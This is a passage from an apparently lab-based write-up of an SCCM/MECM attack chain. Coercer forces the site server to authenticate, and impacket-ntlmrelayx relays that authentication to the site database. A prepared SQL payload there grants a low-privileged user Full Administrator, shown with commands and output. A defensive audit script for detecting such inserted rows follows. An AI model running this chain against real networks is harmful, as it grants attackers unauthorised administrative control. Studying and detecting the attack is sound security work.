Start ntlmrelayx with the SQL query sccmhunter generated. Note that the command above was typed with the site code PO1 (letter O), so the generated query also reads CM_PO1; the actual site code is P01 with a zero, and the query below uses CM_P01 and SourceSite 'P01':

sudo impacket-ntlmrelayx -smb2support -ts -t mssql://192.168.60.12 -q "DECLARE @AdminID INT; USE CM_P01; INSERT INTO RBAC_Admins (AdminSID, LogonName, IsGroup, IsDeleted, CreatedBy, CreatedDate, ModifiedBy, ModifiedDate, SourceSite) SELECT 0x010500000000000515000000FCDE497C9CAFE5E38944A6FA5A040000, 'SCCMLAB\carol', 0, 0, '', '', '', '', 'P01' WHERE NOT EXISTS ( SELECT 1 FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol' ); SET @AdminID = (SELECT TOP 1 AdminID FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol'); INSERT INTO RBAC_ExtendedPermissions (AdminID, RoleID, ScopeID, ScopeTypeID) SELECT @AdminID, RoleID, ScopeID, ScopeTypeID FROM (VALUES  ('SMS0001R', 'SMS00ALL', 29), ('SMS0001R', 'SMS00001', 1), ('SMS0001R', 'SMS00004', 1) ) AS V(RoleID, ScopeID, ScopeTypeID) WHERE NOT EXISTS ( SELECT 1 FROM RBAC_ExtendedPermissions  WHERE AdminID = @AdminID  AND RoleID = V.RoleID  AND ScopeID = V.ScopeID AND ScopeTypeID = V.ScopeTypeID );"

Run Coercer to force the MECM site server (192.168.60.11) to authenticate to our attacker system (192.168.60.100).

sudo coercer coerce -t 192.168.60.11 -l 192.168.60.100 -u carol -p SCCMftw --always-continue
       ______
      / ____/___  ___  _____________  _____
     / /   / __ \/ _ \/ ___/ ___/ _ \/ ___/
    / /___/ /_/ /  __/ /  / /__/  __/ /      v2.4.3
    \____/\____/\___/_/   \___/\___/_/       by @podalirius_

[info] Starting coerce mode
[info] Scanning target 192.168.60.11
[*] DCERPC portmapper discovered ports: 49664,49665,49666,49667,49668,49670,49671,49673,5040,49685
[+] DCERPC port '49670' is accessible!
   [+] Successful bind to interface (12345678-1234-ABCD-EF00-0123456789AB, 1.0)!
      [!] (NO_AUTH_RECEIVED) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotification(pszLocalMachine='\\192.168.60.100\x00')
      [!] (RPC_S_INVALID_NET_ADDR) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotificationEx(pszLocalMachine='\\192.168.60.100\x00')
[+] SMB named pipe '\PIPE\eventlog' is accessible!
   [+] Successful bind to interface (82273fdc-e32a-18c3-3f78-827929dc23ea, 0.0)!
      [!] (NO_AUTH_RECEIVED) MS-EVEN──>ElfrOpenBELW(BackupFileName='\??\UNC\192.168.60.100\jPITGBNj\aa')
[+] SMB named pipe '\PIPE\lsarpc' is accessible!
   [+] Successful bind to interface (c681d488-d850-11d0-8c52-00c04fd90f7e, 1.0)!
      [+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\192.168.60.100\UpPW5sxg\file.txt\x00')
      [+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\192.168.60.100\2zdECnVB\\x00')
      [+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\192.168.60.100\T5c6XM4s\x00')
      [+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\192.168.60.100@80/kWd\share\file.txt\x00')
      [+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFileEx(FileName='\\192.168.60.100\tBzISKNI\file.txt\x00')

With the relay listening, the coerced authentication from the site server's machine account (MECM$) is relayed to the site database and our query is executed:

sudo impacket-ntlmrelayx -smb2support -ts -t mssql://192.168.60.12 -q "DECLARE @AdminID INT; USE CM_P01; INSERT INTO RBAC_Admins (AdminSID, LogonName, IsGroup, IsDeleted, CreatedBy, CreatedDate, ModifiedBy, ModifiedDate, SourceSite) SELECT 0x010500000000000515000000FCDE497C9CAFE5E38944A6FA5A040000, 'SCCMLAB\carol', 0, 0, '', '', '', '', 'P01' WHERE NOT EXISTS ( SELECT 1 FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol' ); SET @AdminID = (SELECT TOP 1 AdminID FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol'); INSERT INTO RBAC_ExtendedPermissions (AdminID, RoleID, ScopeID, ScopeTypeID) SELECT @AdminID, RoleID, ScopeID, ScopeTypeID FROM (VALUES  ('SMS0001R', 'SMS00ALL', 29), ('SMS0001R', 'SMS00001', 1), ('SMS0001R', 'SMS00004', 1) ) AS V(RoleID, ScopeID, ScopeTypeID) WHERE NOT EXISTS ( SELECT 1 FROM RBAC_ExtendedPermissions  WHERE AdminID = @AdminID  AND RoleID = V.RoleID  AND ScopeID = V.ScopeID AND ScopeTypeID = V.ScopeTypeID );"
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[2024-08-17 16:12:15] [*] Protocol Client RPC loaded..
[2024-08-17 16:12:15] [*] Protocol Client SMTP loaded..
[2024-08-17 16:12:15] [*] Protocol Client HTTP loaded..
[2024-08-17 16:12:15] [*] Protocol Client HTTPS loaded..
[2024-08-17 16:12:15] [*] Protocol Client MSSQL loaded..
[2024-08-17 16:12:15] [*] Protocol Client DCSYNC loaded..
[2024-08-17 16:12:15] [*] Protocol Client SMB loaded..
[2024-08-17 16:12:15] [*] Protocol Client LDAP loaded..
[2024-08-17 16:12:15] [*] Protocol Client LDAPS loaded..
[2024-08-17 16:12:15] [*] Protocol Client IMAPS loaded..
[2024-08-17 16:12:15] [*] Protocol Client IMAP loaded..
[2024-08-17 16:12:15] [*] Running in relay mode to single host
[2024-08-17 16:12:15] [*] Setting up SMB Server
[2024-08-17 16:12:15] [*] Setting up HTTP Server on port 80
[2024-08-17 16:12:15] [*] Setting up WCF Server
[2024-08-17 16:12:15] [*] Setting up RAW Server on port 6666

[2024-08-17 16:12:15] [*] Servers started, waiting for connections
[2024-08-17 16:12:35] [*] SMBD-Thread-5 (process_request_thread): Received connection from 192.168.60.11, attacking target mssql://192.168.60.12
[2024-08-17 16:12:35] [*] Authenticating against mssql://192.168.60.12 as SCCMLAB/MECM$ SUCCEED
[2024-08-17 16:12:35] [*] Executing SQL: DECLARE @AdminID INT; USE CM_P01; INSERT INTO RBAC_Admins (AdminSID, LogonName, IsGroup, IsDeleted, CreatedBy, CreatedDate, ModifiedBy, ModifiedDate, SourceSite) SELECT 0x010500000000000515000000FCDE497C9CAFE5E38944A6FA5A040000, 'SCCMLAB\carol', 0, 0, '', '', '', '', 'P01' WHERE NOT EXISTS ( SELECT 1 FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol' ); SET @AdminID = (SELECT TOP 1 AdminID FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol'); INSERT INTO RBAC_ExtendedPermissions (AdminID, RoleID, ScopeID, ScopeTypeID) SELECT @AdminID, RoleID, ScopeID, ScopeTypeID FROM (VALUES  ('SMS0001R', 'SMS00ALL', 29), ('SMS0001R', 'SMS00001', 1), ('SMS0001R', 'SMS00004', 1) ) AS V(RoleID, ScopeID, ScopeTypeID) WHERE NOT EXISTS ( SELECT 1 FROM RBAC_ExtendedPermissions  WHERE AdminID = @AdminID  AND RoleID = V.RoleID  AND ScopeID = V.ScopeID AND ScopeTypeID = V.ScopeTypeID );
[2024-08-17 16:12:35] [*] SMBD-Thread-7 (process_request_thread): Connection from 192.168.60.11 controlled, but there are no more targets left!
[2024-08-17 16:12:35] [*] SMBD-Thread-8 (process_request_thread): Connection from 192.168.60.11 controlled, but there are no more targets left!
[2024-08-17 16:12:35] [*] ENVCHANGE(DATABASE): Old Value: master, New Value: CM_P01
[2024-08-17 16:12:35] [*] INFO(MSSQL): Line 1: Changed database context to 'CM_P01'.

Our low-privileged user, carol, should now be a full site administrator:

python3 sccmhunter.py admin -u carol@sccm.lab -p 'SCCMftw' -ip 192.168.60.11

SCCMHunter v1.0.5 by @garrfoster
[16:13:21] INFO     [!] Enter help for extra shell commands

() C:\ >> show_admins
[16:13:27] INFO     Tasked SCCM to list current SMS Admins.
[16:13:27] INFO     Current Full Admin Users:
[16:13:27] INFO     SCCMLAB\Administrator
[16:13:27] INFO     SCCMLAB\SCCM-Admins
[16:13:27] INFO     SCCMLAB\carol
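From the defender's side, the relayed INSERT above leaves a recognisable footprint in the site database: the new RBAC_Admins row carries empty strings in CreatedBy and CreatedDate, and it is paired with the Full Administrator role (SMS0001R) on the SMS00ALL scope. The following audit script is an added example, not code from the original post or from sccmhunter; it runs over constructed rows shaped like RBAC_Admins and RBAC_ExtendedPermissions (column names taken from the post's query) and assumes that admins created through the console have CreatedBy and CreatedDate populated. It also decodes the binary SID form sccmhunter printed (0x0105...) back to S-1-5-... text so a finding can be matched against the directory.

```python
"""Audit SCCM RBAC admin rows for signs of out-of-band insertion.

Added example, not part of the original post or of sccmhunter. Rows are
constructed in the shape of RBAC_Admins / RBAC_ExtendedPermissions in the
CM_<site> database, using the column names from the post's INSERT statements.
"""
from dataclasses import dataclass

FULL_ADMIN_ROLE = "SMS0001R"   # Full Administrator role ID used in the post's query
ALL_SCOPE = "SMS00ALL"          # "All" scope, ScopeTypeID 29 in the post's query


def sid_bytes_to_string(blob: bytes) -> str:
    """Decode a binary SID (the 0x0105... form sccmhunter printed) to S-1-5-... text."""
    revision, count = blob[0], blob[1]
    authority = int.from_bytes(blob[2:8], "big")            # 48-bit, big-endian
    subs = [int.from_bytes(blob[8 + 4 * i:12 + 4 * i], "little") for i in range(count)]
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))


def sid_string_to_bytes(sid: str) -> bytes:
    """Inverse of sid_bytes_to_string; used here only to build sample rows."""
    parts = sid.split("-")                                    # ["S", "1", "5", "21", ...]
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(x) for x in parts[3:]]
    out = bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
    return out + b"".join(s.to_bytes(4, "little") for s in subs)


@dataclass
class AdminRow:                 # subset of RBAC_Admins columns
    admin_id: int
    admin_sid: bytes
    logon_name: str
    created_by: str
    created_date: str


@dataclass
class PermissionRow:            # subset of RBAC_ExtendedPermissions columns
    admin_id: int
    role_id: str
    scope_id: str
    scope_type_id: int


def audit_admins(admins, perms, approved_full_admins):
    """Return {LogonName: [reasons]} for admin rows a defender should review."""
    approved = {n.lower() for n in approved_full_admins}
    findings = {}
    for a in admins:
        reasons = []
        # Assumption: console-created admins carry a creator and a timestamp;
        # the relayed INSERT in the post writes empty strings into both columns.
        if not a.created_by.strip() or not a.created_date.strip():
            reasons.append("empty CreatedBy/CreatedDate (not created via console)")
        mine = [p for p in perms if p.admin_id == a.admin_id]
        is_full_admin = any(p.role_id == FULL_ADMIN_ROLE and p.scope_id == ALL_SCOPE for p in mine)
        if is_full_admin and a.logon_name.lower() not in approved:
            reasons.append("Full Administrator on SMS00ALL but not in approved baseline")
        if reasons:
            findings[a.logon_name] = reasons
    return findings


# Constructed sample data. carol's SID is the value the post shows; the other
# SIDs reuse her domain SID with made-up RIDs (500 = built-in Administrator).
CAROL_SID = bytes.fromhex("010500000000000515000000FCDE497C9CAFE5E38944A6FA5A040000")
DOMAIN_SID = sid_bytes_to_string(CAROL_SID).rsplit("-", 1)[0]

SAMPLE_ADMINS = [
    AdminRow(1, sid_string_to_bytes(DOMAIN_SID + "-500"), r"SCCMLAB\Administrator",
             r"SCCMLAB\Administrator", "2024-07-01 10:00:00"),
    AdminRow(2, sid_string_to_bytes(DOMAIN_SID + "-1105"), r"SCCMLAB\SCCM-Admins",
             r"SCCMLAB\Administrator", "2024-07-01 10:05:00"),
    AdminRow(3, CAROL_SID, r"SCCMLAB\carol", "", ""),        # what the relayed query wrote
]
SAMPLE_PERMS = [
    PermissionRow(1, FULL_ADMIN_ROLE, ALL_SCOPE, 29),
    PermissionRow(2, FULL_ADMIN_ROLE, ALL_SCOPE, 29),
    PermissionRow(3, FULL_ADMIN_ROLE, ALL_SCOPE, 29),         # the three rows from the post's query
    PermissionRow(3, FULL_ADMIN_ROLE, "SMS00001", 1),
    PermissionRow(3, FULL_ADMIN_ROLE, "SMS00004", 1),
]
APPROVED_FULL_ADMINS = [r"SCCMLAB\Administrator", r"SCCMLAB\SCCM-Admins"]


def run_sample():
    """Audit the constructed rows; only carol's row should be flagged."""
    return audit_admins(SAMPLE_ADMINS, SAMPLE_PERMS, APPROVED_FULL_ADMINS)


if __name__ == "__main__":
    sids = {a.logon_name: sid_bytes_to_string(a.admin_sid) for a in SAMPLE_ADMINS}
    for name, reasons in run_sample().items():
        print(f"{name} ({sids[name]}): {'; '.join(reasons)}")
```

In a real environment the rows would come from a scheduled query against CM_P01 (or whichever CM_<site> database applies) rather than from constructed data, and the approved list would be the set of Full Administrators that change control knows about; the empty audit columns are the stronger signal, because a relayed INSERT bypasses the SMS Provider and therefore never fills them in.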

In Conclusion

There are a number of other attacks against SCCM, particularly in relation to relaying, which I’ll be looking into in future.